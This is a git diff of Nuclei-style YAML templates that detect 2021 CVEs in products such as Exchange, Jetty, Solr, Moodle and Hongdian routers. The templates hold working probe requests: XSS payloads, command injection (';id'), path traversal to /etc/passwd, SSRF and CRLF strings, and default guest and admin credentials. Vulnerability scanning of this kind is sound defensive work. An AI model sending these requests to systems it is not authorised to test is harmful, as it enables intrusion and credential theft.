index 0000000000..bc9d4332f5
--- /dev/null
+++ b/cves/2021/CVE-2021-26475.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-26475
+
+info:
+ name: EPrints 3.4.2 XSS
+ author: geeknik
+ description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI.
+ reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
+ severity: medium
+ tags: cve,cve2021,xss,eprints
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/cves/2021/CVE-2021-26710.yaml b/cves/2021/CVE-2021-26710.yaml
index 026d9d3744..ed5fc3662d 100644
--- a/cves/2021/CVE-2021-26710.yaml
+++ b/cves/2021/CVE-2021-26710.yaml
@@ -4,8 +4,9 @@ info:
name: Redwood v4.3.4.5-v4.5.3 XSS
author: pikpikcu
severity: medium
+ description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter.
reference: https://vict0ni.me/report2web-xss-frame-injection.html
- tags: cve,cve2021,Redwood,xss
+ tags: cve,cve2021,redwood,xss
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-26722.yaml b/cves/2021/CVE-2021-26722.yaml
index 43dbf4eabe..e5546fa281 100644
--- a/cves/2021/CVE-2021-26722.yaml
+++ b/cves/2021/CVE-2021-26722.yaml
@@ -4,7 +4,8 @@ info:
name: LinkedIn Oncall 1.4.0 XSS
author: pikpikcu
severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26722
+ description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar.
+ reference: https://github.com/linkedin/oncall/issues/341
tags: cve,cve2021,linkedin,xss
issues: https://github.com/linkedin/oncall/issues/341
diff --git a/cves/2021/CVE-2021-26723.yaml b/cves/2021/CVE-2021-26723.yaml
index 942a03e24c..a84f46e2cc 100644
--- a/cves/2021/CVE-2021-26723.yaml
+++ b/cves/2021/CVE-2021-26723.yaml
@@ -4,7 +4,12 @@ info:
name: Jenzabar v9.20-v9.2.2 XSS
author: pikpikcu
severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26723
+ description: Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS.
+ reference: |
+ - http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html
+ - https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205
+ - https://jenzabar.com/blog
+ - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328
tags: cve,cve2021,jenzabar,xss
requests:
diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml
new file mode 100644
index 0000000000..c6316beaa3
--- /dev/null
+++ b/cves/2021/CVE-2021-26812.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-26812
+
+info:
+ name: Moodle jitsi plugin XSS
+ author: aceseven (digisec360)
+ description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application.
+ severity: medium
+ tags: cve,cve2021,moodle,jitsi,xss
+ reference: |
+ - https://github.com/udima-university/moodle-mod_jitsi/issues/67
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "alert(document.domain);"
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "MoodleSession"
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml
new file mode 100644
index 0000000000..f5df4f2484
--- /dev/null
+++ b/cves/2021/CVE-2021-26855.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-26855
+
+info:
+ name: Exchange Server SSRF Vulnerability
+ author: madrobot
+ severity: critical
+ description: |
+ Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
+ tags: cve,cve2021,ssrf,rce,exchange
+ reference: |
+ - https://proxylogon.com/#timeline
+ - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
+ - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
+ - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
+
+requests:
+ - raw:
+ - |
+ GET /owa/auth/x.js HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
+ Accept-Language: en
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
+ - 503
+
+ - type: word
+ words:
+ - 'X-Calculatedbetarget: somethingnonexistent'
+ part: header
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml
new file mode 100644
index 0000000000..0f16811c2a
--- /dev/null
+++ b/cves/2021/CVE-2021-27132.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-27132
+
+info:
+ name: CRLF Injection - Sercomm VD625
+ author: geeknik
+ severity: medium
+ description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
+ tags: cve,cve2021,crlf
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 404
+ part: header
+
+ - type: word
+ words:
+ - "Content-Disposition: attachment;filename=test.txt"
+ - "Set-Cookie:CRLFInjection=Test"
+ - "Location: example.com"
+ - "X-XSS-Protection:0"
+ part: header
+ condition: and
diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml
new file mode 100644
index 0000000000..b356cf909a
--- /dev/null
+++ b/cves/2021/CVE-2021-27330.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-27330
+
+info:
+ name: Triconsole 3.75 XSS
+ author: pikpikcu
+ severity: medium
+ description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
+ reference: https://www.exploit-db.com/exploits/49597
+ tags: cve,cve2021,triconsole,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/calendar_form.php/">'
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-27561.yaml b/cves/2021/CVE-2021-27561.yaml
new file mode 100644
index 0000000000..ca860d8534
--- /dev/null
+++ b/cves/2021/CVE-2021-27561.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-27561
+
+info:
+ name: YeaLink DM PreAuth RCE
+ author: shifacyclewala,hackergautam
+ severity: critical
+ description: A malicious actor can trigger Unauthenticated Remote Code Execution
+ tags: cve,cve2021,rce,yealink
+ reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ condition: and
+ part: body
+ words:
+ - 'uid'
+ - 'gid'
+ - 'groups'
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ regex:
+ - "(u|g)id=.*"
diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml
new file mode 100644
index 0000000000..dfd14878a0
--- /dev/null
+++ b/cves/2021/CVE-2021-27651.yaml
@@ -0,0 +1,41 @@
+id: CVE-2021-27651
+
+info:
+ name: Pega Infinity Authentication bypass
+ author: idealphase
+ description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
+ reference: |
+ - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
+ severity: critical
+ tags: cve,cve2021,pega,auth-bypass
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/prweb/PRAuth/app/default/"
+
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Pega Infinity"
+ part: body
+
+ - type: regex
+ regex:
+ - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
+ part: body
+
+ extractors:
+ - type: regex
+ regex:
+ - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
+ part: body
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml
new file mode 100644
index 0000000000..22a15c83a9
--- /dev/null
+++ b/cves/2021/CVE-2021-27850.yaml
@@ -0,0 +1,57 @@
+id: CVE-2021-27850
+
+info:
+ name: Apache Tapestry - Arbitrary class download
+ description: |
+ A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
+ author: pdteam
+ severity: critical
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
+ tags: cve,cve2021,apache,tapestry
+
+requests:
+ - raw:
+ - |
+ GET /assets/app/something/services/AppModule.class/ HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Connection: close
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.9
+ - |
+ GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Connection: close
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.9
+
+ extractors:
+ - type: regex
+ regex:
+ - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
+ internal: true
+ name: id
+ part: header
+ group: 1
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'application/java'
+ part: header
+
+ - type: word
+ words:
+ - 'configuration'
+ - 'webtools'
+ part: body
+ condition: and
diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml
new file mode 100644
index 0000000000..5b4805182a
--- /dev/null
+++ b/cves/2021/CVE-2021-27905.yaml
@@ -0,0 +1,41 @@
+id: CVE-2021-27905
+
+info:
+ name: Apache Solr <= 8.8.1 SSRF
+ author: hackergautam
+ severity: medium
+ tags: cve,cve2021,apache,solr,ssrf
+ description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
+ reference: |
+ - https://www.anquanke.com/post/id/238201
+ - https://ubuntu.com/security/CVE-2021-27905
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
+ - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
+
+requests:
+ - raw:
+ - |
+ GET /solr/admin/cores?wt=json HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ Connection: close
+
+ - |
+ GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ Connection: close
+
+ extractors:
+ - type: regex
+ regex:
+ - '"status"\:\{"(.*?)"\:\{"name"'
+ name: core
+ group: 1
+ internal: true
+
+ matchers:
+ - type: word
+ words:
+ - 'OK '
+ part: body
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-28073.yaml b/cves/2021/CVE-2021-28073.yaml
new file mode 100644
index 0000000000..534e9f8735
--- /dev/null
+++ b/cves/2021/CVE-2021-28073.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-28073
+
+info:
+ name: Ntopng Authentication Bypass
+ author: z3bd
+ severity: critical
+ description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2
+ tags: ntopng,cve,cve2021
+ reference: |
+ - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
+ - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css"
+ - "{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: word
+ words:
+ - '"results":'
+ - '"name":'
+ - '"tab":'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml
new file mode 100644
index 0000000000..e9f4040fdd
--- /dev/null
+++ b/cves/2021/CVE-2021-28149.yaml
@@ -0,0 +1,56 @@
+id: CVE-2021-28149
+
+info:
+ name: Hongdian Directory Traversal
+ author: gy741
+ severity: medium
+ description: |
+ Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
+ reference: |
+ - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149
+ tags: cve,cve2021,hongdian,traversal
+
+requests:
+ - raw:
+ - |
+ GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ - |
+ GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Authorization: Basic YWRtaW46YWRtaW4=
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "application/octet-stream"
+ part: header
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - "sshd:[x*]"
+ - "root:[$]"
+ part: body
diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml
new file mode 100644
index 0000000000..f1dade1c72
--- /dev/null
+++ b/cves/2021/CVE-2021-28150.yaml
@@ -0,0 +1,55 @@
+id: CVE-2021-28150
+
+info:
+ name: Hongdian Sensitive Information
+ author: gy741
+ severity: medium
+ description: |
+ Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
+ reference: |
+ - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150
+ tags: cve,cve2021,hongdian,exposure
+
+requests:
+ - raw:
+ - |
+ GET /backup2.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ - |
+ GET /backup2.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Authorization: Basic YWRtaW46YWRtaW4=
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "application/octet-stream"
+ part: header
+
+ - type: word
+ words:
+ - "CLI configuration saved from vty"
+ - "service webadmin"
+ part: body
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml
new file mode 100644
index 0000000000..5f440a6d14
--- /dev/null
+++ b/cves/2021/CVE-2021-28151.yaml
@@ -0,0 +1,69 @@
+id: CVE-2021-28151
+
+info:
+ name: Hongdian Command Injection
+ author: gy741
+ severity: high
+ description: |
+ Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest.
+ reference: |
+ - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151
+ tags: cve,cve2021,hongdian,rce
+
+requests:
+ - raw:
+ - |
+ POST /tools.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 85
+ Cache-Control: max-age=0
+ Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+ Upgrade-Insecure-Requests: 1
+ Origin: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Referer: http://{{Hostname}}/tools.cgi
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ op_type=ping&destination=%3Bid
+
+ - |
+ POST /tools.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 85
+ Cache-Control: max-age=0
+ Authorization: Basic YWRtaW46YWRtaW4=
+ Upgrade-Insecure-Requests: 1
+ Origin: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Referer: http://{{Hostname}}/tools.cgi
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ op_type=ping&destination=%3Bid
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: word
+ words:
+ - "uid="
+ - "gid="
+ - "groups="
+ part: body
+ condition: and
diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml
new file mode 100644
index 0000000000..859333bacb
--- /dev/null
+++ b/cves/2021/CVE-2021-28164.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-28164
+
+info:
+ name: Jetty Authorization Before Parsing and Canonicalization
+ author: noamrathaus
+ severity: medium
+ description: |
+ The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.
+ reference: |
+ - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
+ - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty
+ tags: cve,cve2021,jetty
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/%2e/WEB-INF/web.xml"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "java.sun.com"
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/xml"
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml
new file mode 100644
index 0000000000..00d2820a84
--- /dev/null
+++ b/cves/2021/CVE-2021-28169.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-28169
+
+info:
+ name: Jetty Utility Servlets Information Disclosure
+ author: pikpikcu
+ severity: medium
+ reference: |
+ - https://twitter.com/sec715/status/1406787963569065988
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28169
+ description: |
+ For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory.
+ tags: cve,cve2021,jetty
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/static?/%2557EB-INF/web.xml"
+ - "{{BaseURL}}/concat?/%2557EB-INF/web.xml"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "application/xml"
+ part: header
+
+ - type: word
+ words:
+ - ""
+ - "java.sun.com"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-28854.yaml b/cves/2021/CVE-2021-28854.yaml
new file mode 100644
index 0000000000..4a9b0724e2
--- /dev/null
+++ b/cves/2021/CVE-2021-28854.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-28854
+
+info:
+ name: VICIdial - Multiple sensitive Information disclosure
+ author: pdteam
+ severity: high
+ description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21
+ reference: https://github.com/JHHAX/VICIdial
+ tags: cve,cve2021
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/agc/vicidial_mysqli_errors.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'text/plain'
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'vdc_db_query'
+ part: body
diff --git a/cves/2021/CVE-2021-28937.yaml b/cves/2021/CVE-2021-28937.yaml
new file mode 100644
index 0000000000..30132099ca
--- /dev/null
+++ b/cves/2021/CVE-2021-28937.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-28937
+
+info:
+ name: Acexy Wireless-N WiFi Repeater Password Disclosure
+ author: geeknik
+ description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext.
+ reference: https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990
+ severity: medium
+ tags: cve,cve2021,acexy,disclosure,iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/password.html"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Password Setting"
+ - "addCfg('username'"
+ - "addCfg('newpass'"
+ condition: and
diff --git a/cves/2021/CVE-2021-29156.yaml b/cves/2021/CVE-2021-29156.yaml
new file mode 100644
index 0000000000..b92aededf1
--- /dev/null
+++ b/cves/2021/CVE-2021-29156.yaml
@@ -0,0 +1,21 @@
+id: CVE-2021-29156
+
+info:
+ name: LDAP Injection In Openam
+ author: melbadry9,xelkomy
+ severity: high
+ tags: cve,cve2021,openam
+ description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
+ reference: https://blog.cybercastle.io/ldap-injection-in-openam/
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/openam/ui/PWResetUserValidation"
+ - "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation"
+ - "{{BaseURL}}/ui/PWResetUserValidation"
+
